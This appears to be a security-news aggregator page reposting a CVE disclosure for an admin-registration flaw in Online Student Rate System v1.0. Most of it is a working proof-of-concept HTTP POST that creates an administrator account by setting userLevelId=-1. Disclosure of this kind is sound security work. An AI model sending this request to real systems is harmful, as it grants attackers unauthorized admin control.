Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-39409: GitHub - StefanDorresteijn/CVE-2021-39409: Admin account registration in Online Student Rate System

A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.

CVE
Open in Source
#vulnerability#linux#git#php#auth#firefox

CVE-2021-39409

Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

Vulnerability

POST /ajax.php?action=signup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://localhost
Connection: close
Referer: http://localhost

username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&[email protected]

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE